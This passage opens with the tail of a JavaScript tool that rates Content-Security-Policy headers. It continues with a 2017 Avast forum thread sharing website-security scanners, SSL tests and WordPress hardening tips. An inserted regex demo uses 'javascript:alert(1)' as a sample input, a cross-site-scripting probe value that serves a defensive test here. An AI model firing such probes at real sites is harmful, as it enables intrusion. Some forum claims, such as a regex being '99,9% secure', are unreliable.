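  const script = governingLists(policies, 'script-src', true);
  if (script.length === 0) {
    add('high', 'script-src', 'neither script-src nor default-src is set; any script may run');
  } else {
    if (everyListHas(script, (s) => s === "'unsafe-inline'"))
      add('high', 'script-src', "'unsafe-inline' lets injected inline scripts run");
    if (everyListHas(script, (s) => s === "'unsafe-eval'"))
      add('medium', 'script-src', "'unsafe-eval' keeps eval()-style sinks open");
    if (everyListHas(script, (s) => s === '*' || /^https?:$/.test(s)))
      add('high', 'script-src', 'a wildcard or bare scheme allows scripts from any host');
    if (everyListHas(script, (s) => s === "'self'"))
      add('medium', 'script-src', "'self' can be problematic if you host JSONP, Angular or user uploaded files");
  }

  const objects = governingLists(policies, 'object-src', true);
  if (!objects.some((list) => list.includes("'none'")))
    add('medium', 'object-src', "not 'none'; plugin content from an allowed source can act as a script host");

  if (governingLists(policies, 'frame-ancestors', false).length === 0)
    add('medium', 'frame-ancestors', 'not set; clickjacking protection relies on X-Frame-Options alone');
  if (governingLists(policies, 'base-uri', false).length === 0)
    add('low', 'base-uri', 'not set; an injected <base> tag can redirect relative script URLs');

  return findings;
}

function report(header) {
  return evaluateCsp(header)
    .map((f) => `${f.severity.padEnd(6)} ${f.directive}: ${f.message}`)
    .join('\n');
}

console.log('observatory.mozilla.org header:\n' + report(OBSERVATORY_CSP));
console.log('\nconstructed weak header:\n' + report(WEAK_CSP));
```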
Title: Re: Tests and other Media topics
Post by: polonus on January 27, 2017, 03:36:04 PM
Some more sites to check (blocked) IP: https://www.threatminer.org/host.php?q=
And see SSL Server Security Tests at work in real time: https://www.htbridge.com/ssl/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 02, 2017, 09:58:38 PM
It could be interesting to establish what kind of security layers have been implemented for a specific website.

This is apart from how the confidentiality of a site has been guaranteed, i.e. whether HTTPS has been implemented correctly.
Apart from this we always have to harden and protect servers from known server exploits, wrong security settings and
against targeted phishing and malware attacks (but we have avast there, haven't we  ;D).

We should be particularly aware of mail servers: banners shouldn't speak too loudly about the versions used, but pinging certain mail servers without version info will produce them anyway. So test non-invasively via banners and functional tests
for which ESMTP functions are being supported (when we find no transport encryption support, this means that everything is transported in clear text over the Internet). Some firewalls and outdated security policies will only support plain SMTP,
meaning fewer attacks but a lack of transport encryption of any sort.

Also read here: https://blog.qualys.com/ssllabs/2016/09/06/is-http-public-key-pinning-dead

What was being tested?

- Qualys SSL labs score?
- High Tech Bridge HTTPS score?
- High Tech Bridge web security score?
- HTTPS implemented?
- DNSSEC implemented?
- HTTP Strict Transport Security Policy implemented?
- Weak ciphers support?
- CSP implemented?
- Unknown jQuery security updates?
- HTTPOnly Security not being set for cookie?
- live-Twitter Javascript code?
- Google Analytics active?
- Live Google advertising?
- Live Google Javascript Code?
- Type HTTP redirect?
- Wildcard Certificate or many domain names in certificate?
- Extended Validation Certificate?
- Certificate Transparency Certificate?
- Perfect Forward Security supported?
- HSTS Preloading vulnerability?
- X-Frame-Options implemented?
- X-Powered by Header?
- Autocomplete set at password field (now obsolete)?
- Same Site Protection not set for cookie?
- Publication of Technical Info?
- Client-Initiated-Secure-Renegotiation supported?
- Subresource Integrity (SRI) implemented?
- TLS 1.0 supported?
- Vulnerable to BEAST attack?
- Vulnerable to DROWN attack?
- OCSP Alert Sample configured?
- Public-Key-pinning implemented? (see link, seems dead now)
- X-XSS-Protection implemented?
- X-Content-Type-Options implemented?

Scan proposal info - info credits go out to security researcher, Sijmen Ruwhof.

polonus (volunteer website security analyst and website error-hunter)


Title: Re: Tests and other Media topics
Post by: polonus on February 24, 2017, 04:46:10 PM
Were you vulnerable to Cloudbleed?

Check with this extension: https://chrome.google.com/webstore/detail/cloudbleed-bookmark-check/egoobjhmbpflgogbgbihhdeibdfnedii/related

Does a website have CloudFlare: http://www.doesitusecloudflare.com/
Then check that website's SRI hash security status here: https://sritest.io/

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 24, 2017, 06:59:07 PM
In my particular case checking for cloudbleed-bookmark I found:
Quote
The following bookmarked sites may have been affected by Cloudbleed:

sritest.io
securityheaders.io
codefromthe70s.org
hetrixtools.com
yehg.net
cyberwarzone.com
adguard.com
downuptime.net

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 25, 2017, 04:41:40 PM
With the above list results in mind, we can then check here: http://cloudflarelistcheck.abal.moe/
So for instance adguard.com was affected. Then also check here: https://cloudbleedcheck.com/?domain=
Constant updates of list: https://github.com/pirate/sites-using-cloudflare/blob/master/README.md

pol



Title: Re: Tests and other Media topics
Post by: polonus on March 16, 2017, 12:44:11 PM
WordPress security checks we (Eddy, others and little old me) often perform here:
https://hackertarget.com/wordpress-security-scan/

Check for retirable jQuery libraries can be performed here: retire.insecurity.today/#
Same origin sri-hash issues: https://sritest.io/#
Additionally perform a scan here: https://sitecheck.sucuri.net/
and here: http://www.domxssscanner.com/scan?url=
Also test here for DNS issues and whether (hosting) name server versions are being exposed:
http://www.dnsinspect.com/
Get the test status results here: https://observatory.mozilla.org/
and here for cert issues: cryptoreport.websecurity.symantec.com

When we have all these third-party combined test results we can start to secure the website built with WordPress as a CMS. First we start to mitigate the threats detected and then harden the system.

Mind you, most important are your data. These should be cared for like good ripening wine.  ;)
An application can easily be rebuilt any time, so consider application restore to be like the freshness of fish:
fish should always be red at the gills. ;)  Update and patch, folks, always and continuously!

Even WordPress security suggestion sites could be suspicious like: -https://yoast.com/wordpress-security/

In a following posting I will suggest some steps you can take to better secure your WordPress website
and to harden it against abuse.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: bob3160 on March 16, 2017, 02:19:39 PM
(http://screencast-o-matic.com/screenshots/u/Lh/1489670337099-76511.png)
https://bob3160.wordpress.com/
Title: Re: Tests and other Media topics
Post by: polonus on March 16, 2017, 10:51:37 PM
German government officials warn against 20.000 vulnerable cloud environments

Check your cloud environment with that vulnerable software here:

https://scan.owncloud.com/ 

and here:

https://scan.nextcloud.com/

See this would be followed up and you could end such problems for the future:
https://en.wikipedia.org/wiki/General_Data_Protection_Regulation#Sanctions

Those that endanger the data of users should be presented with a bill for the inconvenience
and not put up the social community with their costs and losses,
and keep all the profits to themselves.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 17, 2017, 01:17:08 PM
WordPress hardening - About username & password.

A nice tool for creating safer passwords for your WordPress CMS re: https://tools.arantius.com/password
and this one: https://strongpasswordgenerator.com/
and additionally this generator: https://www.random.org/strings/

A bad username/password combination is insecure. Do not use admin (make a new account named administrator) and passwords that can be revealed through brute forcing. Use a random name for your user base.
Never use the name of the website, use capitals, small characters, numbers and special characters.
Remember you can use spaces within a password, so create a password sentence, like
"1 c@n M8K3  ^ l33t pa$$w0Rd".

Installatron is a good tool to create a random username and password. Change your password often, make it good, secure and random. Your users should do likewise, use Norton Password Generator or Strong Password Generator: https://identitysafe.norton.com/password-generator/

User Enumeration is not available
It was not possible to easily enumerate usernames from the user ID's. This is a good thing, as it can add difficulty to brute force password attacks if the username is not able to be determined.

It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Only the first two user ID's were tested with this scan, use the Nmap NSE enumeration scripts (use your own Nmap installation or try the advanced membership option) to discover additional user ID's.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 17, 2017, 06:54:06 PM
Test your ssl connection in your browser here: https://badssl.com/
Also test here: https://testsafebrowsing.appspot.com/
Tested for a phish and got it right: http://testsafebrowsing.appspot.com/s/phishing.html
or http://testsafebrowsing.appspot.com/s/notif_pageload.html
Connection insecure: https://subdomain.preloaded-hsts.badssl.com/
Example: -http://www.degoudsbloem.nl/
Finally tested here: https://www.htbridge.com/ssl/?id=f00c790aaf4381d4ad23234e3f70e9768f10fe8b003aee51b3980ed88043b72d

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 20, 2017, 10:44:35 PM
@ the browser users here...

Test your browser's SSL-configuration.

Here: https://www.ssllabs.com/ssltest/viewMyClient.html
and
https://badssl.com/dashboard/  part of https://badssl.com/
and
https://www.howsmyssl.com/
and
https://geekflare.com/ssl-test-certificate/  (with ten various SSL testing tools).

enjoy, my good avast friends, enjoy,

polonus

P.S. How the code is being maintained and updated (upgraded): https://github.com/chromium/badssl.com
Title: Re: Tests and other Media topics
Post by: REDACTED on March 25, 2017, 06:11:24 PM
Hi there!
I'm a developer and we are having some issues with avast and Kaspersky at www.langademy.com
We use WebRTC to make video calls. Many users are having issues when they make WebRTC calls because the AV blocks the WebRTC resources in the navigator (at least in Chrome). Any idea why this is happening?  :'(
Title: Re: Tests and other Media topics
Post by: Asyn on March 25, 2017, 06:31:19 PM
Hi there!
I'm a developer and we are having some issues with avast and Kaspersky at www.langademy.com
We use WebRTC to make video calls. Many users are having issues when they make WebRTC calls because the AV blocks the WebRTC resources in the navigator (at least in Chrome). Any idea why this is happening?  :'(
Start a new topic in V&W: https://forum.avast.com/index.php?action=post;board=4
Title: Re: Tests and other Media topics
Post by: mchain on March 25, 2017, 06:37:40 PM
https://www.quttera.com/detailed_report/www.langademy.com
Title: Re: Tests and other Media topics
Post by: polonus on March 26, 2017, 07:37:49 PM
Advertised as circumventing the Ghost Ban problem with this Uncensored Anonymous Search Page.
It takes you to a page that cannot be opened over https! Is this no longer serviced by GoDaddy,
and could it be that this http search site keeps track of those that search for alternative content, just adding to the Ghost Ban/Alternative News/FakeNews/Mainline News controversy?

Re: -http://gibiru.com/

I would shun such a site and not bookmark it. Do we have similar problems here?: http://www.hongkiat.com/blog/private-search-engines/

polonus


Title: Re: Tests and other Media topics
Post by: polonus on April 12, 2017, 05:58:01 PM
In the light of the thousands of hacked WordPress websites, scan if your router is vulnerable here:

https://www.wordfence.com/blog/2017/04/check-your-router/#

Background read: https://www.wordfence.com/blog/2017/04/home-routers-attacking-wordpress/

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 12, 2017, 10:40:53 PM
Now when you tested and found it to be open, when your ISP provider does that, it is also their responsibility when you get hacked by Mirai botnet for example. Such IT spooks have all sorts of excuses.

Re: https://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/ 

They have known about this hole since 2014, and if they continue to leave it open it could be both sloppy IT management and also gross negligence when the flaw is being abused.

The port is used for remote management by the provider. Test again here: https://www.grc.com/x/ne.dll?bh0bkyd2

Read: https://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/

So when your provider leaves it open they want to remotely mess with your router settings. That is nasty. It is you that should do the router settings, at least that is what we think in Europe, it may be quite another story in the U.S. of A.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 15, 2017, 01:26:26 PM
Following Breaking News.

How to protect your firefox browser against  Unicode Phishing Attack?

With the firefox browser one could use the following work-around:
Quote
Open Firefox:

1. Enter the following text into the address bar of Firefox: about:config
2. Read the alert and then proceed further.
3. Enter this text into the address bar: punycode
4. You will now see this appear: network.IDN_show_punycode
5. Double-clicking this item will change false into true.
6. Close the tab page.

Info credits go to:  Dongel

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on April 15, 2017, 02:27:59 PM
Following Breaking News.

How to protect your firefox browser against  Unicode Phishing Attack?

With the firefox browser one could use the following work-around:
Quote
Open Firefox:

1. Enter the following text into the address bar of Firefox: about:config
2. Read the alert and then proceed further.
3. Enter this text into the address bar: punycode
4. You will now see this appear: network.IDN_show_punycode
5. Double-clicking this item will change false into true.
6. Close the tab page.

Info credits go to:  Dongel

polonus

For me, having to edit the about:config for most people is a step too far, as you would have to edit for individual issues.

Phishing in itself has to be covered through security based add-ons (or the browser itself), the likes of NoScript, RequestPolicy, etc. Not to mention Avast or other anti-virus.
Title: Re: Tests and other Media topics
Post by: polonus on April 16, 2017, 05:03:10 PM
Take the "can the browser identify you by the adblocker you use" test.

Do it here: https://extensions.inrialpes.fr/

Detected extensions were trafficlight and adguard adblocker.

polonus
Title: Re: Tests and other Media topics
Post by: mchain on April 18, 2017, 03:42:35 AM
Take the "can the browser identify you by the adblocker you use" test.

Do it here: https://extensions.inrialpes.fr/

Detected extensions were trafficlight and adguard adblocker.

polonus
Thanks Pol,

You got me testing a few setups and one in particular seemed to work well:  Opera in VPN Private mode.
Title: Re: Tests and other Media topics
Post by: polonus on April 25, 2017, 03:12:47 PM
Privacy-OS Tails 2.0 script with an excellent regular expression

Quote
: new RegExp('^(http|https):\/\/[a-z0-9\-_]+(\.[a-z0-9\-_]+)+([a-z0-9\-_\.,@\?^=%&;:/~\+#]*[a-z0-9\-\_#@\?^=%&;/~\+])?$', 'i');

Almost perfect Rubular regular expression - emails are secure that way. Excellent, 99,9% secure.

Where in the code we detect this one: https://tails.boum.org/lib/js/mirror-dispatcher.js

Online tester here: https://regex101.com/

polonus
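Added example, not the Tails project's own code: the quoted pattern is handed to new RegExp() as a string literal, and JavaScript string literals consume backslash escapes ('\.' is just '.') before the regex engine sees them, whereas a regex literal keeps them. The block below builds both forms from the same characters and runs constructed sample URLs through them, which is worth checking when reusing the pattern elsewhere.

```javascript
// Added example, not from tails.boum.org: the quoted pattern built the way the
// post shows it (new RegExp with a string literal) next to the same characters
// written as a regex literal. In a string literal '\.' becomes '.', '\/' becomes
// '/' and so on, so the engine compiles a different pattern in the two cases.
const fromStringLiteral = new RegExp(
  '^(http|https):\/\/[a-z0-9\-_]+(\.[a-z0-9\-_]+)+([a-z0-9\-_\.,@\?^=%&;:/~\+#]*[a-z0-9\-\_#@\?^=%&;/~\+])?$',
  'i'
);
const asRegexLiteral =
  /^(http|https):\/\/[a-z0-9\-_]+(\.[a-z0-9\-_]+)+([a-z0-9\-_\.,@\?^=%&;:\/~\+#]*[a-z0-9\-\_#@\?^=%&;\/~\+])?$/i;

// What the regex engine actually compiled in each case (RegExp#source).
function compiledSources() {
  return { fromString: fromStringLiteral.source, fromLiteral: asRegexLiteral.source };
}

// Which of the two forms accepts a candidate URL.
function checkUrl(candidate) {
  return {
    url: candidate,
    stringForm: fromStringLiteral.test(candidate),
    literalForm: asRegexLiteral.test(candidate),
  };
}

// Constructed sample inputs: the Tails file itself, a mixed-case URL with a query
// and fragment, two non-http inputs a URL validator should reject, and two inputs
// the two forms treat differently because '.' matches any character in the string form.
const SAMPLES = [
  'https://tails.boum.org/lib/js/mirror-dispatcher.js',
  'HTTPS://EXAMPLE.ORG/search?q=a&b=c#frag',
  'ftp://example.org/file',
  'javascript:alert(1)',
  'http://example',       // no dot anywhere in the host
  'http://exa mple.org',  // a space inside the host
];

function runSamples() {
  return SAMPLES.map(checkUrl);
}

for (const r of runSamples()) {
  console.log(`${r.url.padEnd(52)} string form: ${r.stringForm}  regex literal: ${r.literalForm}`);
}
```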
Title: Re: Tests and other Media topics
Post by: polonus on April 30, 2017, 12:51:28 AM
How to stop this spy inside your browser.

Read about how font tracking with fonts.googleapis.com for instance is spying on you from inside the browser: http://fontfeed.com/archives/google-webfonts-the-spy-inside/

A great extension for those with relevant knowledge as to know how to toggle it, e.g. what to block and what to allow or add is:
Negotiator: https://chrome.google.com/webstore/detail/negotiator/lfopjlendebbnfddpgpoaahmpbgmffii

Just clicking and you see what's tracking you from where to where and how to block it eventually.
Consider what third party tracking you wanna block (somewhat like with Ghostery or Disconnect) or what you wanna allow,
considering the amount of functionality needed to do on the webpage what you plan to do, and whether you trust that
connection. So this is for the advanced user who knows what goes on beneath the hood of their browser of choice.

It reminds me much of Request Policy add-on for/in firefox and it is a great companion alongside uBlock and uMatrix extensions.
I'm quite charmed by the layout, rather versatile little extension, folks.

polonus (volunteer website security analyst and website error hunter)
Title: Re: Tests and other Media topics
Post by: DavidR on April 30, 2017, 01:45:27 AM
How to stop this spy inside your browser.

Read about how font tracking with fonts.googleapis.com for instance is spying on you from inside the browser: http://fontfeed.com/archives/google-webfonts-the-spy-inside/

A great extension for those with relevant knowledge as to know how to toggle it, e.g. what to block and what to allow or add is:
Negotiator: https://chrome.google.com/webstore/detail/negotiator/lfopjlendebbnfddpgpoaahmpbgmffii
<snip>
polonus (volunteer website security analyst and website error hunter)

That is somewhat devious, what most would consider innocuous 'fonts.googleapis.com', like it was just using a font repository for a better range of fonts on the website, very sneaky.
Title: Re: Tests and other Media topics
Post by: Lisandro on April 30, 2017, 10:49:44 PM
A great extension for those with relevant knowledge as to know how to toggle it, e.g. what to block and what to allow or add is:
Negotiator: https://chrome.google.com/webstore/detail/negotiator/lfopjlendebbnfddpgpoaahmpbgmffii
You're right: "for those with relevant knowledge" but also "with time to invest"... uBlock is doing part of that, but automatically...
Title: Re: Tests and other Media topics
Post by: DavidR on April 30, 2017, 11:20:01 PM
A great extension for those with relevant knowledge as to know how to toggle it, e.g. what to block and what to allow or add is:
Negotiator: https://chrome.google.com/webstore/detail/negotiator/lfopjlendebbnfddpgpoaahmpbgmffii
You're right: "for those with relevant knowledge" but also "with time to invest"... uBlock is doing part of that, but automatically...

I think that the RequestPolicy firefox add-on would probably cover most of this (if trying to block fonts.googleapis.com) and would appear to be less complex for the user.
Title: Re: Tests and other Media topics
Post by: mchain on May 16, 2017, 08:52:19 AM
Was working on another topic and came across this: 
http://securitypreview.zscaler.com/?utm_source=web-sticky-cta

Take the test and see how you do.
Title: Re: Tests and other Media topics
Post by: digmor crusher on May 16, 2017, 07:08:24 PM
Well I tried this, got an F, pretty much failed everything.

I am running through a router with a firewall, Windows firewall, Emsisoft Anti Malware, MBAM (real time), Voodoo Shield, Ublock Origin, and block 3rd party cookies in Chrome.

So I think this test is a crock. How would anyone even pass these tests?
Title: Re: Tests and other Media topics
Post by: bob3160 on May 16, 2017, 08:23:21 PM
Well I tried this, got an F, pretty much failed everything.

I am running through a router with a firewall, Windows firewall, Emsisoft Anti Malware, MBAM (real time), Voodoo Shield, Ublock Origin, and block 3rd party cookies in Chrome.

So I think this test is a crock. How would anyone even pass these tests?
Purchase and install their product. :)
Title: Re: Tests and other Media topics
Post by: DavidR on May 16, 2017, 08:32:21 PM
Well I tried this, got an F, pretty much failed everything.

I am running through a router with a firewall, Windows firewall, Emsisoft Anti Malware, MBAM (real time), Voodoo Shield, Ublock Origin, and block 3rd party cookies in Chrome.

So I think this test is a crock. How would anyone even pass these tests?

I rarely if ever take these tests as to be able to even take the test, I would effectively have to drop my defences to be able to take the test and for me that is madness.

With just one level of defence in my browser,  Firefox with NoScript, RequestPolicy, uBlock Origin, CookieMonster, firefox with 3rd party cookies blocked, etc. etc. Zscaler is left spinning its wheels with nothing able to load, so no test or result. For me that is 100%
Title: Re: Tests and other Media topics
Post by: midnight on May 16, 2017, 09:54:06 PM
I took the test and got this popup with sound.
Title: Re: Tests and other Media topics
Post by: polonus on May 16, 2017, 10:08:47 PM
That is a good result, dear midnight, it means the general test file to see whether your AV functions OK gives the right OK result.
Eicar is harmless, just to test whether your AV alerts where it should. Reason to be glad and satisfied.

polonus
Title: Re: Tests and other Media topics
Post by: mchain on May 18, 2017, 01:45:06 AM
Eicar Test is testing your WebShield blocking.  It works it would appear.

Point of the test is to point out how much further a consumer would have to go to button down their system to be similar to a corporate system; DavidR's system setup apparently will not even let the scripts involved run on his system, so he is good to go.  I'd say he was protected.
Title: Re: Tests and other Media topics
Post by: polonus on May 27, 2017, 05:02:21 PM
Antispam, feeding spammer with some anti spam to bite their teeth on: http://www.auditmypc.com/freescan/antispam.html

Another way to perform anti-spam: http://www.grall.name/posts/1/antiSpam-emailAddressObfuscation.html

URL decoder/encode: http://www.grall.name/posts/1/antiSpam-emailAddressObfuscation.html
& http://www.url-encode-decode.com/  &   https://2cyr.com/decode/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 27, 2017, 05:41:49 PM
See what is going on via this Threat Map: https://threatmap.fortiguard.com/
Maybe you see this: http://fortiguard.com/encyclopedia/ips/44037

Another one: http://map.norsecorp.com/

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on May 27, 2017, 05:59:44 PM
Your fortiguard link isn't working.
Title: Re: Tests and other Media topics
Post by: DavidR on May 27, 2017, 06:23:28 PM
See what is going on via this Threat Map: https://threatmap.fortiguard.com/
Maybe you see this: http://fortiguard.com/encyclopedia/ips/44037


Your fortiguard link isn't working.

Which one/s ?
I have been able to connect to all three links.
Title: Re: Tests and other Media topics
Post by: bob3160 on May 27, 2017, 07:16:27 PM
link ending in 44037
Title: Re: Tests and other Media topics
Post by: mchain on May 27, 2017, 07:21:10 PM
link ending in 44037
It's reachable for me.  See <snip> below:
Title: Re: Tests and other Media topics
Post by: bob3160 on May 27, 2017, 07:27:34 PM
link ending in 44037
It's reachable for me.  See <snip> below:
(http://screencast-o-matic.com/screenshots/u/Lh/1495906032757-72627.png)
Title: Re: Tests and other Media topics
Post by: Gopher John on May 27, 2017, 09:22:22 PM
No problems here for that link.
Title: Re: Tests and other Media topics
Post by: polonus on May 30, 2017, 11:05:39 AM
Oh those poor amateur PHP programmers: https://cdn.sstatic.net/insights/Img/Survey/2017/SalaryAndExperienceByLanguage.svg

Get a boost from javascript and study ethical hacking (pen-testing).

Not for me as a volunteer, but I won't complain.

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on May 30, 2017, 11:24:40 AM
Oh those poor amateur PHP programmers: https://cdn.sstatic.net/insights/Img/Survey/2017/SalaryAndExperienceByLanguage.svg
<snip>
polonus

Wow, that was a trip down memory lane, some languages that I would have thought would have died by now. Possibly an indication of the number of years experience of the respondents, old languages, old programmers ;D

SQL - Ahh, whilst my last 4.5 years in the services we were on a number of projects that were using Oracle Forms that used SQL within that. With some of those old languages, I was surprised not to see COBOL still listed. I had a hard time on my COBOL course (3 weeks) with tables.
Title: Re: Tests and other Media topics
Post by: polonus on June 16, 2017, 07:36:09 PM
Create a list for your AS with Filter List Generator: https://www.dan.me.uk/filtergen

enjoy, also the other tools on that website.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 17, 2017, 09:56:35 PM
Do a IPv6 Leak Test: http://ipv6leak.com/
Also enjoy the other tests here: http://routersecurity.org/testrouter.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 21, 2017, 12:08:59 AM
Last 10 internal IPs you used, do they ring familiar? Test here: http://www.auditmypc.com/internal-ip-address.asp

polonus

Title: Re: Tests and other Media topics
Post by: REDACTED on June 21, 2017, 10:21:00 AM
Hi DavidR,

Agree with you and bob3160 here, https only or http nowhere are inferior solutions as we compare this to the combination of the no script and request policy extension, where we still have the complete avast! Shields protection against http malcoded content ((obfuscated) malscripts, malicious iFrames and various malicious redirects, backlinks to drive-by-malware). Additionally users have google safebrowsing, pre-scanning guidance, so in order to get infested you have to ignore warnings and this could be qualified as "unwise" user intervention. Https only and http nowhere extensions never helped against the PEBKAC problem as the main cause of malcode getting onto computers and peripherals,

polonus

I see some websites that both use https, but one https has an exclamation mark beside it and the other hasn't and is green in colour. What is the difference between them? I read a lot on the internet that https is secure, but why are those two https different?
Title: Re: Tests and other Media topics
Post by: DavidR on June 21, 2017, 11:01:59 AM
Generally the exclamation point is indicating mixed content on what is an https connection, e.g. they import content from an http source. Green would be confirming the https connection is all secure content.
Title: Re: Tests and other Media topics
Post by: polonus on June 21, 2017, 02:13:55 PM
Hi Vamert,

Many people think that  http.. versus https... will say something about the actual security of a particular website.
That is an often found misconception. Http or https only say something about a more secure connection between client and (web)server.

So in that sense the https-everywhere mission led by Google and EFF is in a sense more of a cosmetic nature, and a lot of folks therefore misinterpret what the green padlock stands for. It may just say your connection does not let your account name and password go as plain text over the wires. Often we need more, like sri-hashes generated especially for external links for google analytics etc., so the same origin protocol is being upheld, protecting from code injection to make the actual website more secure, as with security headers, etc. etc.

There are still loads of websites with problems not directing to https-everywhere or the implementation of https-only.

polonus (volunteer website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on July 01, 2017, 10:13:29 PM
Mozilla on the success of the Https-Everywhere campaign: https://blog.mozilla.org/security/2017/06/28/analysis-alexa-top-1m-sites/

HTTPS:// is of course an important security measure to be taken to safeguard a secure connection.

Still the https-everywhere project will be more of a cosmetic means to an end than anything else.
Also things may go drastically wrong when automatic redirects from http:// to https:// fail.

Look where a lot of other issues are found to be insecure, despite https-everywhere: https://www.eff.org/https-everywhere/atlas/

Example for a site that comes "disabled by default": https://www.eff.org/https-everywhere/atlas/domains/openstreetmap.org.html

Secure and safe connections may be safeguarded, just like at home when the curtains are closed,
but what insecurity goes on behind closed curtains is a guess, and that insecurity should worry us to a greater extent.

A green padlock to rock us asleep. Behind that could come insecure cloud services,
a free account with a sub-domain soon no longer to be ours (afraid dot org for example).

And where website security is concerned we meet with quite some issues. The attached image speaks for itself.

We'd better educate those m- & p-developers to turn them into 'security savvy' coder pack,
and then all the other folks that work with website building and maintaining websites secure.

But one way or another these aims are always being grandly frustrated by those,
who have other important interests in keeping things as they are,
so the infrastructure stays insecure or becoming more insecure even so.

Excessive server info proliferation for insecure nameservers. An immense problem in the linux infrastructure.
Some insecure servers lower down in the network could infest all of the rest, like with Poodle etc.

For aspx sites perform an asafaweb scan, do a little query on shodan or perform a dazzlepod ip scan.

What to do about malicious evil DNS? Re: https://www.theregister.co.uk/2016/02/16/glibc_linux_dns_vulernability/
Random example here: http://www.dnsinspect.com/ns1.com/10056192

What to do about insecure CMS like Joomla or WordPress like with this scanner? -
hackertarget.com/wordpress-security-scan/
with a random example: https://www.magereport.com/scan/?s=https://hacmint.com/

What to do about retirable jScript libraries? See: http://www.dnsinspect.com/ns1.com/10056192

What to do and how to generate when we find missing hashes here?: https://sritest.io/
or a bad status here: https://observatory.mozilla.org/

Also import the sources & sinks, we could stumble upon while scanning here: http://www.domxssscanner.com/

It seems it is overwhelming, that is why the latest targeted cyberwar attacks were such a success, or rather catastrophic.

When are we gonna see a change for the better, will we ever live to see this?

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 02, 2017, 05:01:14 PM
Well, to explain the point in the previous posting: https://blog.sucuri.net/2017/06/sql-injection-vulnerability-wp-statistics.html

Word Press as a CMS stays a problem-factory, scan here: hackertarget.com/wordpress-security-scan/

For sql injection vuln.: www.domxssscanner.com

greets,

pol
Title: Re: Tests and other Media topics
Post by: polonus on July 04, 2017, 04:50:15 PM
Into CSS and source mapping. Nice resources here for ye all:
https://www.thecssninja.com/demo/source_mapping/

Also nice to use: https://www.w3schools.com/tags/tryit.asp?filename=tryhtml5_input_type_hidden
Could lead to flags for cloaking in the is it hacked scan (alert cloaking is when Googlebot has a difference in bytes shown to Google's).

enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 11, 2017, 10:05:32 AM
New technology to restore trusting your documents:

https://proofofexistence.com/

Newest online bitcoin blockchain technology to handle your docs integrity,
amidst situations where your trust in certain services comes cheap,
where you have to find your way amidst Big Media Fake News and Social Media Censorship,
where you may not longer come to trust your own gubberment etc.

Now you have to fence for yourselves, folks, as you always had to.

Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 11, 2017, 12:30:17 PM
A nice little proggie: https://blog.didierstevens.com/programs/usbvirusscan/
Read also: http://geeknizer.com/top-usb-hacks-pwn/ 2015

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 12, 2017, 06:49:53 PM
Why uBlock Origin now has a new companion extension named uBlock Origin Extra?
Read: https://www.theregister.co.uk/2017/08/11/ad_blocker_bypass_code/
and https://github.com/gorhill/uBO-Extra
Get it here: https://chrome.google.com/webstore/detail/ublock-origin-extra/pgdnlhfefecpicbbihgmbmffkjpaplco/related

enjoy,

pol
Title: Re: Tests and other Media topics
Post by: Asyn on August 12, 2017, 06:54:34 PM
Hi Pol, some valuable info, thanks a lot..!! :)
Title: Re: Tests and other Media topics
Post by: DavidR on August 12, 2017, 07:25:53 PM
Why uBlock Origin now has a new companion extension named uBlock Origin Extra?
Read: https://www.theregister.co.uk/2017/08/11/ad_blocker_bypass_code/
and https://github.com/gorhill/uBO-Extra
Get it here: https://chrome.google.com/webstore/detail/ublock-origin-extra/pgdnlhfefecpicbbihgmbmffkjpaplco/related

enjoy,

pol

I'm starting to find uBlock Origin bit of a pain in the backside.

I'm continually having to switch it off as it is blocking things that I feel are too aggressive. Even trying to exclude those sites doesn't seem to resolve the problem as it would appear that the exclusion is only for originating site (image1 & image3). 

It is nowhere near flexible enough, I would like to see it closer to Request policy that allows connections from a site to 3rd party connections and not exclude it for every site (image2).  So I'm honestly considering binning it and not adding additional functionality.
Title: Re: Tests and other Media topics
Post by: bob3160 on August 12, 2017, 07:54:08 PM
Sometimes (IMHO) the cure is worse than the disease. :)
Title: Re: Tests and other Media topics
Post by: DavidR on August 12, 2017, 08:17:57 PM
Sometimes (IMHO) the cure is worse than the disease. :)

This could be the case for some. AdBlockPlus wasn't bad, quite flexible, but then it shot itself in the foot with trustworthiness issues.
Title: Re: Tests and other Media topics
Post by: bob3160 on August 12, 2017, 08:20:54 PM
I right now am putting up with extra ads,
One program is too aggressive and not really adjustable.
The other lost its trust and it will be a long road back towards again earning it.
Title: Re: Tests and other Media topics
Post by: Asyn on August 12, 2017, 08:29:37 PM
I'm starting to find uBlock Origin bit of a pain in the backside.

I'm continually having to switch it off as it is blocking things that I feel are too aggressive. Even trying to exclude those sites doesn't seem to resolve the problem as it would appear that the exclusion is only for originating site (image1 & image3). 

It is nowhere near flexible enough, I would like to see it closer to Request policy that allows connections from a site to 3rd party connections and not exclude it for every site (image2).  So I'm honestly considering binning it and not adding additional functionality.
Hi Dave, uBO is highly flexible and adjustable, guess you didn't dig deep enough yet.
Anyway, I don't want to drag this thread OT, so if you want/need help let me/us know...
Title: Re: Tests and other Media topics
